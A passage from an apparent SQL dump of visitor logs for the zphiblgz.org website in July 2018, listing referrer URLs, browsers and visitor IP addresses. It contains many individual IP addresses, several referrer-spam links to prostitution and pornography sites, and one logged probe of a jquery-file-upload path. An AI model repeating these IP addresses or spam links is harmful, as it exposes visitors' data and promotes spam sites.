WhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040cm91bXRNSUJSejhfdUUxc1NUZ1ZlVzB6Y2hVMXRQdUNidzhrR3VtOUt2USws&sign=16aad2b9c5ef40be1ddcbd8c6c20aab2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.100','000',2,0),(32873,'2018-07-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1842.tJUHzfdxS2YAw9wto8FoB9QnyXfZRjR3cAd7ooIiVf0.c59097a6db77b1b85c595c7084bcb82f566a39bf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZVFBN0xXaE5JdFhPaENTR2lmME43T3F4S1Q3YUVha3JRNHRCNENWX3JGdyws&sign=c0221a86582cebad7048b0f04fa64414&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.96.248','000',2,0),(32874,'2018-07-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1842.7mUGuai-FLq8MEU-EhWhsTCSBeaY0x8N0BNtI32G4cI.17bf2d1550fd7f6170c738d61de6204bddfb23a8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Vlo1ZEpERkZyY0ZreVJOYUVPTzQ3cUZ3SkRuSjJRWE9SZnlsQnhBVWJRZyws&sign=66f548761489731cc569f6ffa6f3184b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.238','000',2,0),(32875,'2018-07-08','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(32876,'2018-07-08','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.31','000',1,0),(32877,'2018-07-08','http://rusochineniya.ru/','MSIE','Windows','6.0','','46.185.119.21','000',3,0),(32878,'2018-07-08','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.29','000',1,0),(32879,'2018-07-08','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(32880,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.210.8','000',2,0),(32881,'2018-07-08','https://zphiblgz.org','libwww-perl','Unknown','6.29','','185.229.227.68','000',40,0),(32882,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.62','000',2,0),(32883,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.229','000',2,0),(32884,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.178.254','000',1,0),(32885,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.180.49','000',2,0),(32886,'2018-07-08','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',2,0),(32887,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.157','000',2,0),(32888,'2018-07-08','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.74','000',2,0),(32889,'2018-07-08','http://porno-chaman.info/','Unknown','Unknown','Unknown','','176.8.89.165','000',1,0),(32890,'2018-07-08','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(32891,'2018-07-08','https://zphiblgz.org','Safari','Macintosh','11.1.1','','71.206.17.147','000',6,0),(32892,'2018-07-08','https://zphiblgz.org','Chrome','Windows','67.0.3396.99','','69.243.42.62','000',4,0),(32893,'2018-07-08','https://zphiblgz.org','Unknown','Unknown','Unknown','','77.120.176.171','000',3,0),(32894,'2018-07-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(32895,'2018-07-08','https://zphiblgz.org','Firefox','Windows','40.1','','80.248.73.242','000',2,0),(32896,'2018-07-08','http://zphiblgz.org/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','193.201.224.210','000',1,0),(32897,'2018-07-08','https://zphiblgz.org','Firefox','Windows','40.1','','59.180.161.111','000',2,0),(32898,'2018-07-08','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(32899,'2018-07-08','https://ogorodnic.com/','MSIE','Windows','6.0','','176.8.89.165','000',1,0),(32900,'2018-07-08','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.102.7.250','000',1,0),(32901,'2018-07-08','https://zphiblgz.org','Chrome','Linux','41.0.2272.118','','66.102.7.248','000',1,0),(32902,'2018-07-08','https://www.google.com/','Chrome','Windows','67.0.3396.99','','162.236.137.163','000',6,0),(32903,'2018-07-08','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.122','000',3,0),(32904,'2018-07-08','https://zphiblgz.org','Chrome','Windows','57.0.2987.98','','46.229.170.197','000',1,0),(32905,'2018-07-08','https://filesdatabase.net/','MSIE','Windows','6.0','','178.137.83.231','000',2,0),(32906,'2018-07-08','https://zphiblgz.org','Firefox','Windows','40.1','','124.123.49.217','000',2,0),(32907,'2018-07-08','https://zphiblgz.org','Firefox','Windows','40.1','','118.101.41.253','000',2,0),(32908,'2018-07-08','https://zphiblgz.org','Opera Next','Windows','50.0.2762.58','','78.46.156.169','000',1,0),(32909,'2018-07-08','https://zphiblgz.org','Firefox','Windows','40.1','','196.74.18.70','000',2,0),(32910,'2018-07-08','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(32911,'2018-07-08','https://zphiblgz.org','Safari','Macintosh','5.1.8','','88.198.43.207','000',1,0),(32912,'2018-07-08','https://zphiblgz.org','Safari','Macintosh','5.1','','88.99.27.172','000',1,0),(32913,'2018-07-08','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','185.127.16.72','000',2,0),(32914,'2018-07-08','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.188.47','000',1,0),(32915,'2018-07-09','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','69.251.166.38','000',6,0),(32916,'2018-07-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.185.52.224','000',2,0),(32917,'2018-07-09','http://zphiblgz.org/','Safari','Linux','534.34','','35.185.52.224','000',1,0),(32918,'2018-07-09','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.35','000',1,0),(32919,'2018-07-09','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.35','000',1,0),(32920,'2018-07-09','zphiblgz.org','Chrome','Windows','46.0.2754.75','','37.187.77.211','000',2,0),(32921,'2018-07-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.237.24.160','000',4,0),(32922,'2018-07-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1843.qp0Q1yPJzHugcScZTve4rT1eeEq8l6cP0JRlHKqQGvs.c6aa17ca00e2cd2cda6d856b81f516db104013b5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040XzhnQmJLWmt2azN2Q0tmRC1TamxOWWRZXzhUbjhXRjF0N3QtQlZiRWd0Zyws&sign=2c34acac5a9d220a0b2897624e4ac6cf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.32.56.125','000',2,0),(32923,'2018-07-09','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1843.eV4FblazHEaIsR-yVRE7c0iJD-ac4XKds1SIh_CmYDM.e330cd515516ebdc1d83313989242dd79c0a8000&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042RGFPY29YTlhLdFlDa25BbXJNS21VS01BcGhGUDc2YjdQR21WWW1NZnVKdyws&sign=3a85d981c7ccbb257fb02aa6c2ad17f8&keyno=0&b64e=2&l10n=ru','Firefox','Linux','52.0','','77.73.70.14','000',2,0),(32924,'2018-07-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1843._VworDahjuynZRaImuVMTRyTMILp4BntwlgKqQo2xC4.b2c36beca52c908b3a2171d08f29cc90e26c82bc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043dmhxWHc0bzBfY0E0cWp4azhvakI4Rnkzb1YzSEdQTkpGbDdrM3lSWWRIZyws&sign=b4a16fccd050225e21ed6e1626418bc7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.35.127','000',2,0),(32925,'2018-07-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1843.YZXHAg_5m6-Pk5RU3qi4eRsba_QE_9SbVa-kcuDn0kY.00edf0c071746797091c34ba7c2d0eff5fe2f17d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040WDVGN2NBWWZ3dS1jdVlLc0YweXkyRzhRdHF3eUl6TFowTHhwdFpLYmstdyws&sign=3d826cbb4740e247bc6000ad31f52a13&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','52.58.192.209','000',2,0),(32926,'2018-07-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(32927,'2018-07-09','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(32928,'2018-07-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(32929,'2018-07-09','https://zphiblgz.org','MSIE','Windows','11.0','','5.196.54.215','000',1,0),(32930,'2018-07-09','https://zphiblgz.org','Python-urllib','Unknown','2.7','','54.254.166.84','000',2,0),(32931,'2018-07-09','https://ww2awards.info/','MSIE','Windows','5.5','','178.137.86.234','000',2,0),(32932,'2018-07-09','https://moinozhki.com/','MSIE','Windows','6.0','','46.119.125.180','000',4,0),(32933,'2018-07-09','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(32934,'2018-07-09','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32935,'2018-07-09','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1844.eRUCQ3g3ca-EeHQamD69j_HYo2u9KYS8klkgpo8cHwB_4EWPwvB1ZAyAUgXDk1cP.3946130dbe5aafa5bb71d63007815a5388733473&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YG-XUIUpxKrkaoPisARVvB8&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1k0VnYwcS00NlIxTGlqalNMMU1ENUpXUk1IbEtZU3Jxd1N1bWd5Y1otOFBtNmNEOGt2ZENoSENlZjU0aWt2UEljY3Fub3hfN2hNQQ&b64e=2&sign=c58b15ca732322e67793d3d3be3907df&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfSwNvLU7EFf4socFkQ6ppIi81hS8QnG_zYXYplYfaRNKa49KPOwJS4ujYGue3MwqrpTg36xqBtMWGsvJeKXsV8FoKaQ9Iz_b2TojNspSe2AwOj5_addrJVzcqTV2ik0QP&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4Q4Is-8c8iuyY7fG0GD__fNZy-8AfglxlsDjG9zHa9TJg9BBE22ni0JIxaqVdEIe1A&l10n=ru&cts=1531146883029&mc=2.53095714851','MSIE','Windows','8.0','','128.75.73.163','000',1,0),(32936,'2018-07-09','https://zphiblgz.org/','AppleWebKit','Windows','534','','199.30.25.30','000',1,0),(32937,'2018-07-09','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(32938,'2018-07-09','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','52.165.148.51','000',2,0),(32939,'2018-07-09','https://zphiblgz.org','Firefox','Windows','52.0','','45.33.72.115','000',1,0),(32940,'2018-07-09','http://prostitutki-rostova.ru.com/','MSIE','Windows','6.0','','178.137.160.220','000',2,0),(32941,'2018-07-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(32942,'2018-07-09','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(32943,'2018-07-09','https://www.bing.com/','MSIE','Windows','11.0','','167.192.187.86','000',5,0),(32944,'2018-07-09','https://zphiblgz.org','Chrome','Macintosh','55.0.2889.84','','198.23.206.155','000',1,0),(32945,'2018-07-09','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(32946,'2018-07-09','http://moneyzzz.ru/','MSIE','Unknown','6.0','','109.162.66.73','000',1,0),(32947,'2018-07-09','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(32948,'2018-07-09','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(32949,'2018-07-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.28','000',1,0),(32950,'2018-07-09','http://xn-----7kcaaxchbbmgncr7chzy0k0hk.xn--p1ai/','MSIE','Windows','6.0','','178.137.16.67','000',1,0),(32951,'2018-07-09','http://metallosajding.ru/','Opera','Windows','8.00','','109.162.66.73','000',2,0),(32952,'2018-07-09','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.32','000',1,0),(32953,'2018-07-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.35.38.15','000',1,0),(32954,'2018-07-09','http://metallosajding.ru/','Unknown','Unknown','Unknown','','178.137.86.234','000',2,0),(32955,'2018-07-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.25.129','000',2,0),(32956,'2018-07-10','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.5','000',1,0),(32957,'2018-07-10','https://ww2awards.info/','MSIE','Windows','6.0','','46.185.119.21','000',1,0),(32958,'2018-07-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32959,'2018-07-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','220.181.55.141','000',2,0),(32960,'2018-07-10','https://zphiblgz.org','Chrome','Windows','50.0.2661.75','','132.255.220.2','000',6,0),(32961,'2018-07-10','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(32962,'2018-07-10','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',3,0),(32963,'2018-07-10','https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Firefox','Windows','43.0','','178.33.86.51','000',1,0),(32964,'2018-07-10','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(32965,'2018-07-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1844.5gQkjZuwzaSgPtIbKTw8SeTVM0Bk_JY0G9Y5ABfN7eI.2f7fa7e30ad6f459a0babe305979c2b480d69308&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SGZwalBhN1pSdkFKMFVzQXZtR1hDdW5seUUzbnJ6WFBsbF9mWXczZ1Vadyws&sign=a15170f3042d3634b60c0c234bbd6663&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(32966,'2018-07-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1844.P9LcyRKaa_TpRNnIQEEE_5R7Euo61MZOua58LTHKh0k.051a9e1e85e2c192b3245e62b40c80be3cc1ee93&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042VnloNGs1VzVnS25vblBlOVN2M0FiQTA2c1hpNkROdm5XNkhZajBjQWxHdyws&sign=277cc4c19a67b84b072308a9fe1b6da1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.89.55','000',2,0),(32967,'2018-07-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1844.vr7hzzqTZHC2Qv1YeyP1bUi8n476ZU8F9wDvJIUS7D8.a2a3634e7a95ab50b87ae893b3690f730bad8dd8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TnFiY2RsS1pUbTRNN2VqcERjRXhJaU91LXJYRFh5WERJdjFFR0hBNVVYQSws&sign=2a13f5bab2708b9ca707c8c764e3f237&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','34.234.170.94','000',2,0),(32968,'2018-07-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1844.unN0FcmyRxl7MUGZF8GE81llSZ9AXflv5fPIYRE1P4U.e7f08801d51aab1e10636a87c84fb49aa7d5038f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043bzRDZmRXUXFiek0xWUxBaTR6eWE3YTc5Z1RWZVpDQlBaTElESEFkeVFxUSws&sign=67345c660d46d6def9994781069ff135&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.105.53','000',2,0),(32969,'2018-07-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1844.w0Px5b4bsP7J-9B-LGZIUXeoX8yG1CtaF_z-MCajTGc.f711e385e6112577ddda16630b436b8d41c9a261&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040aWFkb2NiZ0t3THlDd25obkNDLVV5VWdBekNyNW81N2ZTWVJMTTV2RlV1Zyws&sign=eb4924d7c03bf13d6abcd6b2686e3630&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.37.100','000',2,0),(32970,'2018-07-10','https://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','Firefox','Windows','44.0','','185.2.32.180','000',1,0),(32971,'2018-07-10','http://www.stavimdveri.ru/sitemap.html','MSIE','Unknown','6.0','','46.119.125.180','000',3,0),(32972,'2018-07-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(32973,'2018-07-10','https://zphiblgz.org','Firefox','Windows','40.1','','151.70.31.200','000',2,0),(32974,'2018-07-10','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','65.154.226.100','000',6,0),(32975,'2018-07-10','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.35','000',1,0),(32976,'2018-07-10','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1845.5tx62pd2VxL0AQ98s55AwqX2i7Iaz7j4Qh3I6mHXrC4d_wvfMduDTeLu3pNwvayc.a9cc3b8f417881fb951f7f160402c79cf0675239&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxYZ2xsMVE0RVN0Y3pVYlEyemF2QU5PV0c2VG1mU0RYcHBSM3FuTG4ybVlQdk9aNGtzbFpiRU1ud01JYThNa28xZThIM2I1TVAwenk&b64e=2&sign=aaf62b317ecd20b0216c06c57e87688f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbicdaBLFwJeZcXeGw49AbvhVKjloUp1WfLBdGW6_JdymOUl9qHn1Mwuk8c4RVjK8e2vRplMmmKndJiWj5BaoFfJf5Flh5gzrHiMNyYhFxuT5hWbCwjv7l93Q&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXT9k-8MqJh839OqoJ1JKl830Y5SO9uCFwsE4kQArrjSDtZc3dTR3She0Sg-LDsenqMBmnhvBLpBg&l10n=ru&cts=1531225440254&mc=4.19232640362','MSIE','Windows','8.0','','128.68.23.9','000',2,0),(32977,'2018-07-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32978,'2018-07-10','https://www.google.com/','Safari','iPhone','11.0','','73.172.115.87','000',2,0),(32979,'2018-07-10','https://manimpotence.com/','MSIE','Windows','6.0','','178.137.86.234','000',3,0),(32980,'2018-07-10','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','31.184.192.185','000',3,0),(32981,'2018-07-10','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',2,0),(32982,'2018-07-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(32983,'2018-07-10','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','95.216.141.155','000',1,0),(32984,'2018-07-10','zphiblgz.org','Chrome','Windows','58.0.1145.75','','209.141.54.221','000',2,0),(32985,'2018-07-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',3,0),(32986,'2018-07-10','http://www.zphibmaryland.org/chapters/','Chrome','Windows','67.0.3396.99','','69.195.247.116','000',3,0),(32987,'2018-07-10','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.88.74','000',1,0),(32988,'2018-07-10','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.249.88.72','000',1,0),(32989,'2018-07-10','http://03e.info/','MSIE','Unknown','6.0','','178.137.160.220','000',1,0),(32990,'2018-07-10','https://www.google.com/','Chrome','Windows','67.0.3396.99','','192.223.242.22','000',2,0),(32991,'2018-07-10','https://zphiblgz.org/','Firefox','Windows','43.0','','149.202.86.188','000',2,0),(32992,'2018-07-10','https://moinozhki.com/','Unknown','Unknown','Unknown','','46.119.125.180','000',3,0),(32993,'2018-07-10','https://zphiblgz.org/download/constitution-by-laws/','AppleWebKit','Windows','534','','40.77.188.31','000',4,0),(32994,'2018-07-10','https://zphiblgz.org','Firefox','Windows','40.1','','90.57.242.239','000',2,0),(32995,'2018-07-10','https://zphiblgz.org','Python','Unknown','3.5','','35.185.108.253','000',1,0),(32996,'2018-07-10','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','178.20.55.16','000',1,0),(32997,'2018-07-10','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(32998,'2018-07-10','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','178.62.1.154','000',2,0),(32999,'2018-07-10','http://dosugrostov.site/','MSIE','Windows','6.0','','178.137.160.220','000',1,0),(33000,'2018-07-11','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(33001,'2018-07-11','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(33002,'2018-07-11','http://prostitutki-spb.spb.ru/','MSIE','Windows','6.0','','178.137.16.67','000',5,0),(33003,'2018-07-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(33004,'2018-07-11','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(33005,'2018-07-11','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(33006,'2018-07-11','https://ww2awards.info/','MSIE','Unknown','6.0','','46.185.119.21','000',3,0),(33007,'2018-07-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(33008,'2018-07-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(33009,'2018-07-11','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(33010,'2018-07-11','http://xn--d1abj0abs9d.in.ua/','Opera','Windows','7.11','','37.229.254.233','000',3,0),(33011,'2018-07-11','https://zphiblgz.org','Firefox','Windows','40.1','','77.222.156.108','000',2,0),(33012,'2018-07-11','https://zphiblgz.org','Python','Unknown','3.5','','35.184.228.58','000',2,0),(33013,'2018-07-11','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.63','000',1,0),(33014,'2018-07-11','https://ww2awards.info/','MSIE','Windows','6.0','','178.137.86.234','000',1,0),(33015,'2018-07-11','http://www.tsatu.edu.ua/','MSIE','Unknown','6.0','','178.137.86.234','000',2,0),(33016,'2018-07-11','http://xn----ctbigni3aj4h.xn--p1ai/','Opera','Windows','9.00','','178.137.160.220','000',2,0),(33017,'2018-07-11','https://zphiblgz.org/','Chrome','Windows','67.0.3396.99','','69.243.42.62','000',1,0),(33018,'2018-07-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1845.9HzuHoxu92DBhj5SBAOKCxsEi-2Ee83aZ9jVWw5beOo.e9208a1eb79337b9980742ab8775e2f32bfc254a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040NzhkWVNjSXc5SEFNVFMxVTBfVGF0aUNxVVNMLTlmNm5GbmRxbHBKZGhYZyws&sign=25add2c8f64c9a9d7cf94c6448e634ae&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.134.63','000',2,0),(33019,'2018-07-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1845.tXfuHTorPPI2vqJLZrXT50PZBR7CFWvLMFZqexz63eo.bed2bd7b915da8804f6e2db8402cbde91dc33e6d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SzVrb2RBc1g0MUtBTkprSDRiOFl6TzlpZnhGZDNKOS11X2hYanprZ2pOZyws&sign=d17eab3ffcfd4727ac0ab2801e4186ce&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.180.2','000',2,0),(33020,'2018-07-11','https://zphiblgz.org','Firefox','Windows','40.1','','110.34.0.215','000',1,0),(33021,'2018-07-11','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1845.86J_I1X4i_-yXVksIbWvlSQiJuJfkEn3HFwV-0BS3cY.9bbc0f1fd417b6e9c418759282d43f8a364ab230&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043eGJvYmlZSklISUdHQWJkN0RxcElNeUV1bTFuQXpWT2pOanJyVjBVY0NxQSws&sign=52ea7d06bf40d64864e1a108d300df30&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.79.176.125','000',2,0),(33022,'2018-07-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bim